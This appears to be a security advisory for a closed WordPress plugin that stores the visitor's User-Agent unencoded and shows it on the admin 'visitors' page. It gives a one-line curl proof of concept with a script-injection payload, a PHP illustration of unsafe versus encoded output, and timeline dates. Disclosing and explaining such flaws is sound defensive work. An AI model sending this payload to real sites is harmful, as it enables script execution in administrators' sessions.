The plugin is affected by an unauthenticated stored cross-site scripting (XSS) vulnerability. The plugin displayed the visitor's User-Agent string within the WordPress admin panel without validating or encoding it.
Proof of Concept
$ curl -i http://localhost:10008/ --user-agent "</script><script>alert(1)</script>"
The payload will be executed on the "visitors" page within the WordPress admin panel.
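The missing output encoding described above, shown as an added example in plain PHP (this is not the plugin's code, and every function name here is hypothetical). It renders the User-Agent value from the proof of concept unencoded, then encoded for an HTML cell and for an inline script; whether the plugin placed the value in a script block is an assumption.

```php
<?php
// Added illustration, not the plugin's source. All function names are hypothetical.

// Constructed sample: the User-Agent value used in the proof of concept.
$stored_ua = '</script><script>alert(1)</script>';

// Vulnerable pattern: a stored request header is written into the page as-is.
function render_cell_unsafe(string $ua): string {
    return '<td>' . $ua . '</td>';
}

// HTML context: encode at output time. In WordPress, esc_html() fills this role.
function render_cell_safe(string $ua): string {
    return '<td>' . htmlspecialchars($ua, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</td>';
}

// Inline <script> context (assumed): HTML entities are not decoded here, so
// JSON-encode with the HEX flags; "<", ">", "&" and quotes become \uXXXX
// escapes and the value cannot close the surrounding script element.
function render_script_safe(string $ua): string {
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_INVALID_UTF8_SUBSTITUTE;
    return '<script>var ua = ' . json_encode($ua, $flags) . ';</script>';
}

// Input side: drop control characters and bound the length before storing.
// This limits abuse of the field but does not replace output encoding.
function normalize_ua(string $raw): string {
    $clean = (string) preg_replace('/[\x00-\x1F\x7F]/', '', $raw);
    return substr($clean, 0, 255);
}

$ua = normalize_ua($stored_ua);
echo "unsafe cell:  ", render_cell_unsafe($ua), "\n";
echo "safe cell:    ", render_cell_safe($ua), "\n";
echo "safe script:  ", render_script_safe($ua), "\n";
```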
No known fix - plugin closed
2021-05-26 (about 3 months ago)
2021-05-27 (about 3 months ago)
2021-07-11 (about 2 months ago)